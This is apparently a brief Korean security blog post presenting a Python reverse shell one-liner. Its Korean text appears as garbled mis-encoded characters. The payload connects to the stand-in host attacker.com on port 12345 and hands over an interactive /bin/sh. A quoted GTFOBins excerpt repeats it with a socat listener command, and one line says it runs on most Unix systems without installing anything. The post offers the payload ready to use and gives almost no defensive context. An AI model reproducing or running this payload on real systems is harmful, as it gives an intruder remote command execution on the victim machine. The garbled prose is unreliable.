๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์‹œ์Šคํ…œ ๋ณด์•ˆ

์‹œ์Šคํ…œ ๋ณด์•ˆ - ํŒŒ์ด์ฌ ๋ฆฌ๋ฒ„์Šค ์‰˜ ์Šคํฌ๋ฆฝํŠธ

Janger 2023. 1. 25. 03:23
728x90



export RHOST=attacker.com
export RPORT=12345
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'


๋Œ€๋ถ€๋ถ„์˜ ์œ ๋‹‰์Šค ๊ณ„์—ด์˜ OS(๋ฆฌ๋ˆ…์Šค, ๋งฅos)์—๋Š” python2๋Š” ์„ค์น˜๊ฐ€ ๋˜์–ด์žˆ๋Š” ๊ฒฝ์šฐ๊ฐ€ ๋งŽ์œผ๋‹ˆ ๋ณ„๋„์˜ ์„ค์น˜ ์—†์ด ๋ช…๋ น์–ด๋งŒ์œผ๋กœ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•˜๋‹ค.

์ถœ์ฒ˜:
https://gtfobins.github.io/gtfobins/python/#reverse-shell

python                          |                          GTFOBins

Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. export RHOST=attacker.com export RPORT=12345 python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s

gtfobins.github.io


728x90